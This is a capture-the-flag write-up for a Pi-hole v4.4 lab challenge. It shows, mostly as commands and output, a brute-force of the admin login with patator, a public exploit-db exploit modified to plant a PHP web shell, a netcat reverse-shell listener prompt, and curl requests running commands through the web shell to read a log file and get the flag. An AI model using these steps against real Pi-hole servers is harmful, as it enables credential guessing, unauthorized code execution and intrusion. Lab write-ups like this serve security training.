It's Always DNS (Smart Home, 300p)

After fixing the routing configuration, your smart door starts functioning again but something in the network is still not functioning as intended.
To be exact, pinging the IP addresses works, but names do not resolve.
Investigate your DNS server Pi-hole (http://envXXX.target03/admin)
and find a way to read the log file at /var/log/dnserror.log

solution

Website is running Pi-hole version v4.4.

screenshot of website

Pi-hole v4.4 has a public exploit. But it is authenticated exploit and the password must be known.

Fortunately, it can be easily guessed or brute-forced and the password is admin. 

# patator http_fuzz url='http://envXXX.target03/admin/index.php?login' method=POST body='pw=FILE0' 0=/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt resolve=envXXX.target03:10.93.XX.Y -x ignore:fgrep='Wrong'
02:40:40 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.12 at 2022-10-05 02:40 EEST
02:40:40 patator    INFO -
02:40:40 patator    INFO - code size:clen       time | candidate                          |   num | mesg
02:40:40 patator    INFO - -----------------------------------------------------------------------------
02:40:41 patator    INFO - 200  26989:26604    0.037 | admin                              |     1 | HTTP/1.1 200 OK
02:40:41 patator    INFO - Hits/Done/Skip/Fail/Size: 1/19/0/0/18, Avg: 31 r/s, Time: 0h 0m 0s

After some poking around with the exploit, looks like the server doesn't have network access, therefore exploit in it's current form (reverse-shell) will not work.

Modify the exploit to have a simple web-shell and execute it. 

# curl -s https://www.exploit-db.com/raw/48519 -o 48519.py
# sed -e 's/#_sPayload/_sPayload/' 48519.py > 48519_mod.py
# python3 48519_mod.py 10.93.XX.Y 10.85.XX.Y admin
[+] Vulnerable URL is http://10.93.XX.Y/admin
[+] Creation success, ID is 6!
[!] Binding to 10.85.XX.Y:80
[+] Yes, we have an incoming connection from 10.93.XX.Y
[!] Closing Listener
[+] Update succeeded.
[+] This system is vulnerable!
Want to continue with exploitation? (Or just run cleanup)? [y/N]: y
Want root access? (Breaks the application!!) [y/N]: N
Ok, make sure to have a netcat listener on "10.85.XX.Y:4444" ("nc -lnvp 4444") and press enter to continue...
[!] Binding to 10.85.XX.Y:80
[+] Yes, we have an incoming connection from 10.93.XX.Y
[!] Closing Listener
[+] Update succeeded.
[+] Calling http://10.93.XX.Y/admin/scripts/pi-hole/php/wnvztzyg.php
[+] Calling exploit succeeded.

[+] Cleaning up now.
[+] Remove success

Retrieve the flag.

# curl -s 'http://10.93.XX.Y/admin/scripts/pi-hole/php/wnvztzyg.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# curl -s 'http://10.93.XX.Y/admin/scripts/pi-hole/php/wnvztzyg.php?cmd=cat%20/var/log/dnserror.log'
Flag is: ctftech{d2564882-4d86}

Flag is ctftech{d2564882-4d86}.

Buy Me A Coffee